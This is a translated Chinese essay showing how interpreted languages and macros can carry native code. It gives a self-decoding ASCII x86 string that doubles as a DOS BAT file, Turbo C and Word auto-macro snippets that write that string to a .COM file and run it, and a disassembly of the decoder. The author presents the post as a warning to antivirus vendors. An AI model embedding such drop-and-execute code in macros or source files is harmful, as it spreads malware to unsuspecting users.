袁哥 (Yuan Ge)
Many anti-virus vendors, when they talk about WORD macro viruses, hold that because macros are interpreted, a macro virus is simple, and the only hard part is the WORD file format. I want to remind everyone that although interpreted code does not get control of the CPU, that does not mean it cannot do big things. What matters is whether the language you are given is convenient for it. In fact, an interpreted language can also seize control of the CPU. So JAVA can be infected too! And a source-file virus does not need the several hundred lines of code that many experts claim.
Below is a DOS .BAT file. Paste it into a file and run it, and you will understand. It displays a message. This is only a demonstration and contains no virus! But the technique can be implemented just as well in JAVA, WORD, or a source file, and it is very simple! So I remind everyone (especially some anti-virus vendors) that they should truly understand that interpreted execution and CPU code execution are not different in essence!
:0jeX4e-005POP]hWeX5ddP^1,FFFFF1,FFF1,4rP^P_jeX4aPY-x-AAR`0`*=00uPBOIAAAAFKAOBPIDMCBALEAJMNCBJALIAAEMMNCBFEGIGFCAENGBGDHCGPHGGJHCHFHDCAGJHDCAGDGPGNGJGOGHCACOCOCOCOCOCOANAKCEAAqqqq
@ECHO OFF
COPY %0.BAT /B C:\BATVIR.COM /B /Y
C:\BATVIR.COM
DEL C:\BATVIR.COM
What this program does is take a string (here, the BAT file itself) and write it out as a file; that is easy to do in a WORD macro, in a source program, in interpreted BASIC, and so on. And that string is itself CPU code. The short leading part decodes the string that follows it, which is how arbitrary CPU code gets turned into letters. Then the file is loaded and executed, and I am afraid most languages provide that ability.
Why go to this trouble? Because many interpreted languages and source programs handle characters very conveniently, while handling binary data is inconvenient or impossible for them. That is why there have been few viruses of this kind.
I must make clear here that I am not teaching people to write viruses; I am reminding everyone (especially some anti-virus vendors) to guard against this kind of virus ahead of time. Although this may cause such viruses to appear sooner, I think that since it is technically possible they will appear sooner or later, so we had better prepare early.
I thought of this while considering whether JAVA could really be infected, because JAVA and many other languages are interpreted, and the functions they provide and their interpreted code are not flexible enough for a virus, whereas CPU code is extremely convenient. It boils down to how an interpreted language can be combined with CPU code. I had never said this out loud, but some time ago I saw a report that such a virus had appeared abroad (the report said you could be infected just by browsing someone's web page, without downloading any software! I think that is not hard to achieve with this method!), and I was also struck by the mistaken understanding of interpreted execution among some of our domestic anti-virus vendors, so I am saying it to draw attention to the issue.
Implementing a source-file virus under Turbo C:
Add the following code to your Turbo C program. If the VIR[] part then stays resident and automatically adds itself to your C programs, isn't that a source-file virus? Simple, right? Think about how many languages' source files could use the same method. I am afraid most of them could do it just as simply!
So a source-file virus is not the several-hundred-line program some so-called experts said it would be, is it?
#include <io.h>       /* creat, write, close (Turbo C) */
#include <stdlib.h>   /* system */
#include <string.h>   /* strlen */

char vir[] = ":0jeX4e-005POP]hWeX5ddP^1,FFFFF1,FFF1,4rP^P_jeX4aPY-x-AAR`0`*=00uPBOIAAAAFKAOBPIDMCBALEAJMNCBJALIAAEMMNCBFEGIGFCAENGBGDHCGPHGGJHCHFHDCAGJHDCAGDGPGNGJGOGHCACOCOCOCOCOCOANAKCEAAqqqq";
int fp;
fp = creat("c:\\temp\\vir.com", 0);   /* create the .COM file */
write(fp, vir, strlen(vir));          /* the original wrote a fixed 200 bytes, which runs past the end of vir[] */
close(fp);
system("c:\\temp\\vir.com");          /* load and run it */
The method in a WORD macro:
Add the following to your WORD auto macro, then change the PRO$ part. Simple! You should be able to do it in other languages now too!
Name$ = Environ$("tmp") + "\MACROVIR.COM"
Open Name$ For Output As #1
pro$ = ":0jeX4e-005POP]hWeX5ddP^1,FFFFF1,FFF1,4rP^P_jeX4aPY-x-AAR`0`*=00uPBOIAAAAFKAOBPIDMCBALEAJMNCBJALIAAEMMNCBFEGIGFCAENGBGDHCGPHGGJHCHFHDCAGJHDCAGDGPGNGJGOGHCACOCOCOCOCOCOANAKCEAAqqqq"
Print #1, pro$
Close #1
Shell Name$
WORD actually uses VB, but not exactly the same VB. In VB, OPEN has a FOR BINARY mode; WORD removed it, so in WORD it is probably not possible to get CPU code in without the string approach, and functions like Chr$ do not seem very compatible. The character-based approach is there for compatibility. In TURBO C you can of course also use __exit__ and other methods; they are just as simple! C has pointers, so you can also let your CPU code take control directly in memory!
Below is the code that the string consists of:
1EE7:0100 3A30    CMP  DH,[BX+SI]   ; the leading colon makes this line a label in a BAT file
1EE7:0102 6A65    PUSH 65           ; 'e'
1EE7:0104 58      POP  AX
1EE7:0105 3465    XOR  AL,65        ; AX = 0x0000 ; 'e'
1EE7:0107 2D3030  SUB  AX,3030
1EE7:010A 35504F  XOR  AX,4F50
1EE7:010D 50      PUSH AX
1EE7:010E 5D      POP  BP           ; BP = 0x8080
1EE7:010F 685765  PUSH 6557
1EE7:0112 58      POP  AX
1EE7:0113 356464  XOR  AX,6464      ; AX = 0x0133
1EE7:0116 50      PUSH AX
1EE7:0117 5E      POP  SI           ; SI = AX = 0x0133
1EE7:0118 312C    XOR  [SI],BP      ; sets the high bit of bytes [0x0133] and [0x0134]
1EE7:011A 46      INC  SI
1EE7:011B 46      INC  SI
1EE7:011C 46      INC  SI
1EE7:011D 46      INC  SI
1EE7:011E 46      INC  SI
1EE7:011F 312C    XOR  [SI],BP      ; [0x138], [0x139]
1EE7:0121 46      INC  SI
1EE7:0122 46      INC  SI
1EE7:0123 46      INC  SI
1EE7:0124 312C    XOR  [SI],BP      ; [0x13B], [0x13C]
1EE7:0126 3472    XOR  AL,72        ; 'r'
1EE7:0128 50      PUSH AX           ; AX = 0x141 = 0x133 XOR 0x72
1EE7:0129 5E      POP  SI           ; SI = AX = 0x141
1EE7:012A 50      PUSH AX
1EE7:012B 5F      POP  DI           ; DI = AX = 0x141
1EE7:012C 6A65    PUSH 65           ; 'e'
1EE7:012E 58      POP  AX
1EE7:012F 3461    XOR  AL,61        ; 'a'
1EE7:0131 50      PUSH AX
1EE7:0132 59      POP  CX           ; CX = AX = 0x04
1EE7:0133 AD      LODSW             ; 0x2D in the string
1EE7:0134 F8      CLC               ; 0x78 in the string
1EE7:0135 2D4141  SUB  AX,4141
1EE7:0138 D2E0    SHL  AL,CL        ; 0x5260 in the string
1EE7:013A 30E0    XOR  AL,AH        ; 0x3060 in the string
1EE7:013C AA      STOSB             ; 0x2A in the string
1EE7:013D 3D3030  CMP  AX,3030
1EE7:0140 75F1    JNZ  0133         ; decodes the string starting at 0x141; qqqq marks the end of the string
                                    ; the 0xF1 displacement is itself the result of decoding "PB"
The encoding used here for the CPU code:
Each byte of CPU code is written as two letters, with ABCDEFGH IJKLMNOP standing for 01234567 89ABCDEF respectively; decoding is the reverse process!